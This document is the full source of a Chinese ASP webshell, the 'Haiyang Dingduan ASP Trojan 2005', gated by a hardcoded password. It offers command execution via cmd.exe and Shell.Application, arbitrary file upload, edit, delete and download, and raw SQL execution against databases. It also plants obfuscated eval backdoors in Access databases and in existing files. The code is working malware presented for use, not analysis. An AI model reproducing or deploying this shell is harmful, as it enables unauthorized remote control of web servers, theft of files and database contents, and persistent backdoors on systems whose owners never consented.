<%@ LANGUAGE="VBSCRIPT" codepage ="936" '密码第一个是11052590,第二个是11052590,查找替换这两个单词就可以改成别的密码了%> <%if err then%> <% end if %> ::::海阳顶端网ASP木马@2005α版:::: <%'上传代码因化境的太长,这完全是抄桂林老兵的,对此表示感谢--上传类定义 response.buffer=true filename=Request.ServerVariables("URL") Server.ScriptTimeout=5000 On Error Resume Next Dim oUpFileStream Class UpFile_Class Dim Form,File Public Sub GetDate (RetSize) '定义变量 Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName Dim iFindStart,iFindEnd Dim iFormStart,iFormEnd,sFormName '代码开始 If Request.TotalBytes < 1 Then Err = 1 Exit Sub End If If RetSize > 0 Then If Request.TotalBytes > RetSize Then Err = 2 Exit Sub End If End If Set Form = Server.CreateObject ("Scripting.Dictionary") Form.CompareMode = 1 Set File = Server.CreateObject ("Scripting.Dictionary") File.CompareMode = 1 Set tStream = Server.CreateObject ("Adodb.Stream") Set oUpFileStream = Server.CreateObject ("Adodb.Stream") oUpFileStream.Type = 1 oUpFileStream.Mode = 3 oUpFileStream.Open oUpFileStream.Write Request.BinaryRead (Request.TotalBytes) oUpFileStream.Position = 0 RequestBinDate = oUpFileStream.Read iFormEnd = oUpFileStream.Size bCrLf = ChrB (13) & ChrB (10) '取得每个项目之间的分隔符 sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1) iStart = LenB (sSpace) iFormStart = iStart+2 '分解项目 Do iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3 tStream.Type = 1 tStream.Mode = 3 tStream.Open oUpFileStream.Position = iFormStart oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart tStream.Position = 0 tStream.Type = 2 tStream.CharSet = "gb2312" sInfo = tStream.ReadText iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1 iFindStart = InStr (22,sInfo,"name=""",1)+6 iFindEnd = InStr (iFindStart,sInfo,"""",1) sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart) If InStr (45,sInfo,"filename=""",1) > 0 Then Set oFileInfo = new FileInfo_Class iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10 iFindEnd = InStr (iFindStart,sInfo,"""",1) sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart) oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1) oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\")) oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1) iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14 iFindEnd = InStr (iFindStart,sInfo,vbCr) oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart) oFileInfo.FileStart = iInfoEnd oFileInfo.FileSize = iFormStart -iInfoEnd -2 oFileInfo.FormName = sFormName file.add sFormName,oFileInfo else tStream.Close tStream.Type = 1 tStream.Mode = 3 tStream.Open oUpFileStream.Position = iInfoEnd oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2 tStream.Position = 0 tStream.Type = 2 tStream.CharSet = "gb2312" sFormValue = tStream.ReadText If Form.Exists (sFormName) Then Form (sFormName) = Form (sFormName) & ", " & sFormValue else form.Add sFormName,sFormValue End If End If tStream.Close iFormStart = iFormStart+iStart+2 Loop Until (iFormStart+2) = iFormEnd RequestBinDate = "" Set tStream = Nothing End Sub End Class Class FileInfo_Class Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt Public Function SaveToFile (Path) On Error Resume Next Dim oFileStream Set oFileStream = CreateObject ("Adodb.Stream") oFileStream.Type = 1 oFileStream.Mode = 3 oFileStream.Open oUpFileStream.Position = FileStart oUpFileStream.CopyTo oFileStream,FileSize oFileStream.SaveToFile Path,2 oFileStream.Close Set oFileStream = Nothing End Function Public Function FileDate oUpFileStream.Position = FileStart FileDate = oUpFileStream.Read (FileSize) End Function End Class %> <% if Request("passwordlcx")="11052590" then session("passwordlcx")="lcx" response.redirect Request.ServerVariables("URL") elseif session("passwordlcx")=""then %>










<%else%> <% if request("up")="yes" then set upload=new UpFile_Class upload.GetDate (1024*1024) for each formName in upload.file set file=upload.file(formName) if file.FileSize>0 then savepath=upload.form("filepath") file.SaveToFile savepath response.write "上传成功!上传后的路径为"&savepath&"
" response.write "

返回上一页
" end if set file=nothing next set upload=nothing showerr() response.end end if %> <% function out() Response.Cookies("password")="" response.redirect ""&url&"" End Function%> <%'-------------------搜索文件函数------------------ on error resume next SearchString = Request("SearchString") count=0 Function SearchFile( f, s, title ) Set fo = objfsolhn.OpenTextFile(f) content = fo.ReadAll'读全部文本到content fo.Close SearchFile = inStr(1, content, S, vbTextCompare)>0 '从第一个字符开始检查content里面是否有S If SearchFile Then'如果有,则提出文件TITLE存入变量 pos1 = InStr(1, content, "", vbTextCompare) pos2 = InStr(1, content, "", vbTextCompare) title = "" If pos1 > 0 And pos2 > 0 Then'取TITLE标记中间的字符 title = Mid( content, pos1 + 7, pos2 - pos1 - 7 ) End If End If End Function Function FileLink( f, title ) vPath =f.Path'取路径 If title = "" Then title = f.Name'做链接 'FileLink = "" & title & "" FileLink = vPath FileLink = "" End Function Sub SearchFolder( fd, s ) found = False For each f In fd.Files pos = InStrRev(f.Path, "." ) If pos > 0 Then ext = Mid(f.Path, pos + 1 ) Else ext = "" End If If LCase(ext) = "asp" or LCase(ext) = "asa" or LCase(ext) = "cer" or LCase(ext) = "cdx" Then If SearchFile( f, s, title ) Then Response.Write FileLink(f, title) count=count+1 End If End If Next For each sfd In fd.SubFolders SearchFolder sfd, s Next End Sub'搜索结束%> <%'-------------------------mssql的sql扩展开始--------------------------------- Dim strsql, objDBConn, objRS, intFieldCount, intCounter,strcon strcon =trim(Request.form("strcon")) strsql =trim(Request.form("SQL")) if strSQL <> "" and lcase(left(trim(strsql),6))<>"select" Then Response.Write "SQL命令: " & strsql & "成功运行
" Set objDBConn = Server.CreateObject("ADODB.Connection") objDBConn.Open strcon objdbconn.execute(strsql) objDBConn.Close Set objDBConn = Nothing end if '-----------------------------------数据库记录列表---------------------------------------- DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" strRootFolder = Server.MapPath("/") scriptname = Request.ServerVariables("SCRIPT_NAME") if request("op")="db" and request("dbname")<>"" and request("tablename")<>"" then dbname=trim(request("dbname")) tablename=request("tablename") Set objConn = Server.CreateObject("ADODB.Connection") if instr(dbname,"Info=False")>0 then objConn.ConnectionString = dbname else objConn.ConnectionString = DBDriver & dbname end if objConn.Open Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE")) if tablename="" then tablename=objTableRS("Table_Name").Value %>
<%=objfsolhn.GetFilename(dbname)%>

<%Do While Not objTableRS.EOF%> <%objTableRS.MoveNext Loop%>
3 "><%=objTableRS("Table_Name").Value%>
<%=tablename%>
">
<%dim mysql,i,j j=1 mysql="Select Top 10 * From ["&tablename&"]" Set objRS=objConn.Execute(mysql) For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write "" if objrs.eof then else DO While NOT objRS.Eof Response.write "" %> <% For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write"" objRS.MoveNext j=j+1 Loop end if set objRs = nothing set objTableRS = nothing objConn.Close set objConn = nothing %>
"&objRS.Fields(i).name&"
" If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then response.write " " else Response.write Server.HTMLEncode(objRs.Fields(i).value) end if Response.write"

最多显示10条记录,要察看更多记录请使用SQL命令


<% Response.End end if %> <% '----------------------------数据库对象列表--------------------------------------------- if request("op")="db" and request("dbname")<>"" then dbname=trim(request("dbname")) Set objConn = Server.CreateObject("ADODB.Connection") 'objConn.ConnectionString = DBDriver & dbname if instr(dbname,"Info=False")>0 then objConn.ConnectionString = dbname else objConn.ConnectionString = DBDriver & dbname end if objConn.Open Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE")) %>
<%=objfsolhn.GetFilename(dbname)%>

<%Do While Not objTableRS.EOF%> <%objTableRS.MoveNext Loop objTableRS.MoveFirst%>
3 "><%=objTableRS("Table_Name").Value%>
执行SQL命令
 <%While Not objTableRS.EOF%> <%Set objColumnRS = objConn.OpenSchema(4,Array(Empty, Empty, objTableRS("Table_Name").Value)) While Not objColumnRS.EOF iLength = objColumnRS("Character_Maximum_Length") iPrecision = objColumnRS("Numeric_Precision") iScale = objColumnRS("Numeric_Scale") iDefaultValue = objColumnRS("Column_Default") If IsNull(iLength) then iLength = " " If IsNull(iPrecision) then iPrecision = " " If IsNull(iScale) then iScale = " " If IsNull(iDefaultValue) then iDefaultValue = " "%> <%objColumnRS.MoveNext Wend objTableRS.MoveNext Set objColumnRS = Nothing Response.write "
" Wend objTableRS.Close Set objTableRS = Nothing objConn.Close Set objConn = Nothing %>
<%=objTableRS("Table_Name").Value%>
字段名 数据类型字段大小精度是否允许为空默认值
<%=objColumnRS("Column_Name")%> <%=fieldtype(objColumnRS("Data_Type"))%> <%=iLength%> <%=iPrecision%> <%If objColumnRS("Is_Nullable") then Response.Write "是" else Response.write "否" End If%> <%=iDefaultValue%>
<% Response.End end if %> <% '----------------------------执行SQL命令--------------------------------------------- if request("op")="sql" then dbname=trim(request("dbname")) Set objConn = Server.CreateObject("ADODB.Connection") 'objConn.ConnectionString = DBDriver & dbname if instr(dbname,"Info=False")>0 then objConn.ConnectionString = dbname else objConn.ConnectionString = DBDriver & dbname end if objConn.Open Set objTableRS = objConn.OpenSchema(20,Array(Empty, Empty, Empty, "TABLE")) j=0 %>
<%=objfsolhn.GetFilename(dbname)%>

<%Do While Not objTableRS.EOF%> <%objTableRS.MoveNext Loop%>
3 "><%=objTableRS("Table_Name").Value%>
">
<%if request("cmd")<>"" then mysql=request("cmd") Set objRS=objConn.Execute(mysql) if objrs.state = 1 then For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write "" if objrs.eof then %> <%else DO While NOT objRS.Eof Response.write "" %> <% For i=0 to objRs.Fields.Count-1 Response.write"" Next Response.write"" objRS.MoveNext j=j+1 Loop end if set objRs = nothing end if end if set objTableRS = nothing objConn.Close set objConn = nothing %>
"&objRS.Fields(i).name&"
" If IsNull(objRs.Fields(i).value) or objRs.Fields(i).value="" or objRs.Fields(i).value=" " then response.write " " else Response.write Server.HTMLEncode(objRs.Fields(i).value) end if Response.write"

<%if request("cmd")<>"" then response.Write("命令执行成功,返回 "&j&" 条记录")%>
<% Response.End end if %> <% url= Request.ServerVariables("URL") if trim(request.form("password"))<>"" and trim(request.form("password"))<>"11052590" then call out() if trim(request.form("password"))="11052590" then response.cookies("password")="allen" response.redirect ""&url&"" else if Request.Cookies("password")<>"allen" then call login() '密码错误 response.end '停止运行 end if select case request("id") case "edit" call edit() case "upload" call upload() case "dir" call dir() case "down" call downloadFile(request("path")) case "inject" call inject() case else call main() end select end if sub login() for i=0 to 25 on error resume next IsObj=false VerObj="" dim TestObj set TestObj=server.CreateObject(ObjTotest(i,0)) If -2147221005 <> Err then IsObj = True VerObj = TestObj.version if VerObj="" or isnull(VerObj) then VerObj=TestObj.about end if ObjTotest(i,2)=IsObj ObjTotest(i,3)=VerObj next %>
<% dim t1,t2,lsabc,thetime t1=timer for i=1 to 500000 lsabc= 1 + 1 next t2=timer thetime=cstr(int(( (t2-t1)*10000 )+0.5)/10) %>
 服务器名  <%=Request.ServerVariables("SERVER_NAME")%>
 服务器IP  <%=Request.ServerVariables("LOCAL_ADDR")%>
 服务器时间  <%=now%>
 本文件绝对路径  <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>
 服务器操作系统  <%=Request.ServerVariables("OS")%>
 服务器运算速度测试  <%=thetime%> 毫秒

 mdb+sql数据库操作:
<%' -------------------在ACESS数据库里写入asp后门开始----------------------- DBDriver = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" dbname=request("dbname") Set objConn = Server.CreateObject("ADODB.Connection") objConn.ConnectionString = DBDriver & dbname objConn.Open objConn.execute("create table notdownloadlcx(notdownloadlcx oleobject)") set rs=server.createobject("adodb.recordset") sql="select * from notdownloadlcx" rs.open sql,objConn,1,3 rs.addnew rs("notdownloadlcx").appendchunk(chrB(asc("<")) & chrB(asc("s")) & chrB(asc("c"))& chrB(asc("r")) & chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(" "))& chrB(asc("r"))& chrB(asc("u"))& chrB(asc("n"))& chrB(asc("a"))& chrB(asc("t"))& chrB(asc("="))& chrB(asc("s"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc("v"))& chrB(asc("e"))& chrB(asc("r"))& chrB(asc(" "))& chrB(asc("l"))& chrB(asc("a"))& chrB(asc("n"))& chrB(asc("g"))& chrB(asc("u"))& chrB(asc("a"))& chrB(asc("g"))& chrB(asc("e"))& chrB(asc("="))& chrB(asc("j"))& chrB(asc("a"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))& chrB(asc("e"))& chrB(asc("v"))& chrB(asc("a"))& chrB(asc("l"))& chrB(asc("("))& chrB(asc("r"))& chrB(asc("e"))& chrB(asc("q"))& chrB(asc("u"))& chrB(asc("e"))& chrB(asc("s"))& chrB(asc("t"))& chrB(asc("."))& chrB(asc("f"))& chrB(asc("o"))& chrB(asc("r"))& chrB(asc("m"))& chrB(asc("("))& chrB(asc("'"))& chrB(asc("#"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("+"))& chrB(asc("'"))& chrB(asc("'"))& chrB(asc(")"))& chrB(asc("<"))& chrB(asc("/"))& chrB(asc("s"))& chrB(asc("c"))& chrB(asc("r"))& chrB(asc("i"))& chrB(asc("p"))& chrB(asc("t"))& chrB(asc(">"))) rs.update rs.close set rs=nothing objConn.close set objConn=nothing '-----------------------------------------------------数据库操作结束------------------------------------ '---------------------免fso代码写文件开始针对中文----------------------------------- pathlcx=trim(Request.form("pathlcx")) textlcx=trim(Request.form("textlcx")) if textlcx<>"" and pathlcx<>"" then textlcx=replace(textlcx,">","^>") textlcx=replace(textlcx,"<","^<") textlcx=replace(textlcx,"&","^&") textlcx=replace(textlcx,chr(34),"^"&chr(34)) textlcx=replace(textlcx,chr(10),"^"&chr(10)) textlcx=replace(textlcx,chr(13),"^"&chr(13)) set shell=server.createobject("shell.application") set shellfolder=shell.namespace("C:\Documents and Settings\Default User\「开始」菜单\程序\附件") set shellfolderitem=shellfolder.parsename("记事本.lnk") set objshelllink =shellfolderitem.getlink objshelllink.path="cmd.exe" objshelllink.arguments="/c echo "&textlcx&">"&pathlcx&" &&del c:\a.lnk" objshelllink.save("c:\a.lnk") shell.namespace("c:\").items.item("a.lnk").invokeverb end if '--------------免fso代码写文件结束-----------免fso表单开始-------------%> <%'-------------免fso表单单代码结束------------%>
" method="post"> 输入要浏览的目录,最后要加\
copy 目录或文件(不要加目录和文件名)
move 目录或文件(不要加目录和文件名)
路径: 程序: 不可以加参数
CMD命令对话框
路径与文件名

 

?up=yes enctype="multipart/form-data"> 已有物理目录+文件名: 文件地址:
<%'-----------------免fso代码shell.application开始------------------ DSnXA = Request.Form("text") '目录浏览 if (DSnXA <> "") then set shell=server.createobject("shell.application") '建立shell对象 set fod1=shell.namespace(DSnXA) set foditems=fod1.items for each co in foditems response.write "" & co.path & "-----" & co.size & "
" next end if %> <% DSnXA1 = Request.Form("text1") '目录拷贝,不能进行文件拷贝 DSnXA2 = Request.Form("text2") if DSnXA1<>"" and DSnXA2<>"" then set shell1=server.createobject("shell.application") '建立shell对象 set fod1=shell1.namespace(DSnXA2) for i=len(DSnXA1) to 1 step -1 if mid(DSnXA1,i,1)="\" then path=left(DSnXA1,i-1) exit for end if next if len(path)=2 then path=path & "\" path2=right(DSnXA1,len(DSnXA1)-i) set fod2=shell1.namespace(path) set foditem=fod2.parsename(path2) fod1.copyhere foditem response.write "command completed success!" end if %> <% DSnXA3 = Request.Form("text3") '目录移动 DSnXA4 = Request.Form("text4") if DSnXA3<>"" and DSnXA4<>"" then set shell2=server.createobject("shell.application") '建立shell对象 set fod1=shell2.namespace(DSnXA4) for i=len(DSnXA3) to 1 step -1 if mid(DSnXA3,i,1)="\" then path=left(DSnXA3,i-1) exit for end if next if len(path)=2 then path=path & "\" path2=right(DSnXA3,len(DSnXA3)-i) set fod2=shell2.namespace(path) set foditem=fod2.parsename(path2) fod1.movehere foditem response.write "command completed success!" end if %> <% DSnXA5 = Request.Form("text5") '执行程序要指定路径 DSnXA6 = Request.Form("text6") if DSnXA5<>"" and DSnXA6<>"" then set shell3=server.createobject("shell.application") '建立shell对象 shell3.namespace(DSnXA5).items.item(DSnXA6).invokeverb response.write "command completed success!" end if %>

Enter Password:
<%end sub%> <% end if %> <%sub main()'---------------------免fso代码结束,fso代码开始--------------------- urlpath=Request.ServerVariables("SERVER_NAME") dim cpath,lpath if Request("path")="" then lpath="/" else lpath=Request("path")&"/" end if if Request("attrib")="true" then cpath=lpath attrib="true" else cpath=Server.MapPath(lpath) attrib="" end if %> <% if request.form("submit1")="返回免fso页面" then call out() end if%> 
<% If (IsObject(oFilelcx)) Then
Response.Write Server.HTMLEncode(oFilelcx.ReadAll)
oFilelcx.Close
Call objfsolhn.DeleteFile(szTempFile, True)
End If %>
<%
Set fd = objfsolhn.GetFolder(Request("path88")&"\")
If SearchString <> "" Then
Response.Write "
如下脚本文件内嵌入搜索的" & SearchString & "关键字:
"
SearchFolder fd,SearchString
End If
%>
切换盘符: <% For Each thing in objfsolhn.Drives Response.write ""&thing.DriveLetter&"盘: " NEXT %>  本机局域网地址: <%= "\\" & oScriptNetlhn.ComputerName & "\" & oScriptNetlhn.UserName %>
<% if Request("attrib")="true" then response.write "点击切换到相对路径编辑模式" else response.write "点击切换到绝对路径编辑模式" end if %> 路径: <%=cpath%>   当前浏览目录:<%=lpath%>
浏览目录: 〖请用绝对路径〗    
<% DSnXA = Request.Form(".CMD") If (DSnXA <> "") Then szTempFile = "c:\" & objfsolhn.GetTempName( ) Call oScriptlhn.Run ("cmd.exe /c " & DSnXA & " > " & szTempFile, 0, True) Set oFilelcx = objfsolhn.OpenTextFile (szTempFile, 1, False, 0) End If%>
" method="POST" name=userdata>
?up=yes enctype="multipart/form-data"> 已有物理目录+文件名: 文件地址:
" method="post"> 关键字搜索:
〖新建文件和新建目录不能同名〗
<% dim theFolder,theSubFolders if objfsolhn.FolderExists(cpath)then Set theFolder=objfsolhn.GetFolder(cpath) Set theSubFolders=theFolder.SubFolders Response.write"回上级目录
" For Each x In theSubFolders%> <%Response.write" "&x.Name&" ×删除
" Next end if %> 		文件名 (鼠标移到文件名可以查看给文件的属性) 大小(字节) 文件操作
<% dim theFiles if objfsolhn.FolderExists(cpath)then Set theFolder=objfsolhn.GetFolder(cpath) Set theFiles=theFolder.Files Response.write"" For Each x In theFiles if Request("attrib")="true" then showstring=""&x.Name&"" else showstring=""&x.Name&"" end if Response.write"" Next end if Response.write"
"&showstring&""&x.size&" edit copy del down inject
" %>
<% end sub sub edit() if request("op")="del" then '**********删除文件******** if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set thisfile = objfsolhn.GetFile(whichfile) thisfile.Delete True Response.write "
删除成功!要刷新才能看到效果.
" '**********删除文件结束******** else if request("op")="copy" then '**********复制文件******** if Request("attrib")="true" then whichfile=Request("path") dsfile=Request("dpath") else whichfile=server.mappath(Request("path")) dsfile=Server.MapPath(Request("dpath")) end if Set thisfile = objfsolhn.GetFile(whichfile) thisfile.copy dsfile Response.write "

源文件:"+whichfile+"

" Response.write "

目的文件:"+dsfile+"
" Response.write "

复制成功!要刷新才能看到效果!

" '**********复制文件结束******** else if request.form("text")="" then if Request("creat")<>"yes" then if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set thisfile = objfsolhn.OpenTextFile(whichfile, 1, False) counter=0 thisline=Server.HTMLEncode(thisfile.readall) thisfile.Close end if %>
">
海阳顶端网ASP木马@2005α版文件编辑器
文件名: "readonly>
<%else if Request("attrib")="true" then whichfile=Request("path") else whichfile=server.mappath(Request("path")) end if Set outfile=objfsolhn.CreateTextFile(whichfile) outfile.WriteLine Request("text") outfile.close Response.write "
修改成功!要刷新才能看到效果!
" end if end if end if end sub %> <% sub dir() if request("op")="del" then '***********删除目录********** if Request("attrib")="true" then whichdir=Request("path") else whichdir=server.mappath(Request("path")) end if objfsolhn.DeleteFolder whichdir,True Response.write "
删除成功!要刷新才能看到效果,删除的目录为:"&whichdir&"
" '**********删除目录结束************* else '***********新建目录********** if request("op")="creat" then if Request("attrib")="true" then whichdir=Request("path") else whichdir=server.mappath(Request("path")) end if objfsolhn.CreateFolder whichdir Response.write "
建立成功!要刷新才能看到效果,建立的目录为:"&whichdir&"
" '***********新建目录结束********** end if end if end sub '****下载文件 function downloadFile(strFile) if request("attrib")="" then strFilename = server.MapPath(strFile) end if if request("attrib")="true" then strFilename = Request("path") end if Response.Buffer = True Response.Clear Set s = Server.CreateObject("ADODB.Stream") s.Open s.Type = 1 on error resume next if not objfsolhn.FileExists(strFilename) then Response.Write("

Error:

" & strFilename & " does not exist

") Response.End end if Set f = objfsolhn.GetFile(strFilename) intFilelength = f.size s.LoadFromFile(strFilename) if err then Response.Write("

Error:

" & err.Description & "

") Response.End end if Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name Response.AddHeader "Content-Length", intFilelength Response.CharSet = "UTF-8" Response.ContentType = "application/octet-stream" Response.BinaryWrite s.Read Response.Flush s.Close Set s = Nothing response.end End Function %> <%'插入文件 sub inject() if Request("id")="inject" and request("attrib")<>"true"then testfile=Server.MapPath(""&Request("path")&"") set thisfile=objfsolhn.OpenTextFile(testfile,8,True,0) thisfile.WriteLine("") thisfile.close Response.write "succeed!请用冰狐浪子asp后门来来访问你插入的文件"&Request("path")&"默认密码是#" else Response.write "

" Response.write "" Response.write "
" end if end sub %> <%function fieldtype(typeid) select case typeid case 130 fieldtype = "文本" case 2 fieldtype = "整型" case 3 fieldtype = "长整型" case 7 fieldtype = "日期/时间" case 5 fieldtype = "双精度型" case 11 fieldtype = "是/否" case 128 fieldtype = "OLE 对象" case else fieldtype = typeid end select end function function fillbefore(str,prefix,totallen) str=CStr(str) if len(str)
警告:对非法使用此程序可能带来的任何不良后果责任自负!海阳顶端网
此版本感谢:网辰在线、桂林老兵、冰狐浪子、蓝屏、小路、wangyong、czy、sun.c所做的一切努力◆LCX&ALLEN◆